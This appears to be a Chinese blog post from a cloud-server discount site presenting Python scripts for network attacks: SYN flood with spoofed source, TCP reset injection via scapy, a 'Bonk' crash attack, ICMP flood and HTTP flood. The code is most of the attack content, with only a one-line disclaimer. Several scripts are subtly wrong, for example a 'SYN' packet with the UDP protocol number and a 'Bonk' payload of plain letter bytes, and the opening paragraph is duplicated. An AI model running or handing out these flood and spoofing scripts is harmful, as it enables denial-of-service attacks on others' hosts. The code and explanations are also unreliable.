云服务器网:购买云服务器和VPS必上的网站!

Python实现的TCP/IP网络攻击技术

SYN Flood攻击
SYN Flood攻击利用了TCP协议三次握手的特点,向目标主机发送大量的SYN连接要求,致使目标主机没法处理正常要求。
代码演示:import socket
import random
target_ip = \”127.0.0.1\”

  1. SYN Flood攻击
    SYN Flood攻击利用了TCP协议三次握手的特点,向目标主机发送大量的SYN连接要求,致使目标主机没法处理正常要求。
    代码演示:
import socket
import random
target_ip = "127.0.0.1"
target_port = 80
source_ip = "192.168.1.1"
spoof_ip = socket.inet_aton(source_ip)
packet = ""
packet += chr(random.randint(0, 255))
packet += chr(random.randint(0, 255))
packet += "\x00\x00"
packet += "\x00\x00"
packet += chr(0x11)
packet += chr(0x94)
packet += "\x00\x00"
packet += spoof_ip
packet += socket.inet_aton(target_ip)
packet += "\x00\x00\x00\x00" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.sendto(packet, (target_ip, target_port))
  1. TCP连接重置攻击
    TCP连接重置攻击利用了TCP协议中的RST标志位,向目标主机发送重置要求,使得目标主机没法继续正常的连接。
    代码演示:
from scapy.all import *
target_ip = "127.0.0.1"
target_port = 80
source_ip = "192.168.1.1"
spoof_ip = IP(src=source_ip, dst=target_ip)
spoof_tcp = TCP(sport=1234, dport=target_port, flags="R", seq=12345)
packet = spoof_ip / spoof_tcp
send(packet, verbose=0)
  1. Bonk攻击
    Bonk攻击利用了Windows系统中的漏洞,在向目标主机发送毛病的IP分片时,致使目标主机崩溃。
    代码演示:
import socket
target_ip = "127.0.0.1"
target_port = 80
packet = b"\x41" * 8 + b"\x42" * 8 + b"\x43" * 8
packet += b"\x44" * 8 + b"\x45" * 8 + b"\x46" * 8
packet += b"\x47" * 8 + b"\x48" * 8 + b"\x49" * 8
packet += b"\x4a" * 8 + b"\x4b" * 8 + b"\x4c" * 8
packet += b"\x4d" * 8 + b"\x4e" * 8 + b"\x4f" * 8
packet += b"\x50" * 8 + b"\x51" * 8 + b"\x52" * 8
packet += b"\x53" * 8 + b"\x54" * 8 + b"\x55" * 8
packet += b"\x56" * 8 + b"\x57" * 8 + b"\x58" * 8
packet += b"\x59" * 8 + b"\x5a" * 8
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(packet, (target_ip, target_port))
  1. ICMP Flood攻击
    ICMP Flood攻击利用了ICMP协议的特点,向目标主机发送大量的回显要求,致使目标主机没法处理正常要求。
    代码演示:
import socket
import random
target_ip = "127.0.0.1"
packet = b"\x08\x00\x01\x02" + b"".join([chr(random.randint(0, 255)).encode() for _ in range(32)])
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
while True:
    s.sendto(packet, (target_ip, 0))
  1. HTTP Flood攻击
    HTTP Flood攻击利用了HTTP协议的特点,向目标主机发送大量的HTTP要求,致使目标主机没法处理正常要求。
    代码演示:
import socket
import random
target_ip = "127.0.0.1"
target_port = 80
packet = "GET / HTTP/1.1\r\n"
packet += "Host: pidancode.com\r\n"
packet += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\r\n"
packet += "Accept-Encoding: gzip, deflate\r\n"
packet += "Connection: keep-alive\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
while True:
    s.send(packet.encode())

以上仅为示例代码,不利用于非法用处。

本文来源:https://www.yuntue.com/post/83280.html | 云服务器网,转载请注明出处!

关于作者: yuntue

云服务器(www.yuntue.com)是一家专门做阿里云服务器代金券、腾讯云服务器优惠券的网站,这里你可以找到阿里云服务器腾讯云服务器等国内主流云服务器优惠价格,以及海外云服务器、vps主机等优惠信息,我们会为你提供性价比最高的云服务器和域名、数据库、CDN、免费邮箱等企业常用互联网资源。

为您推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注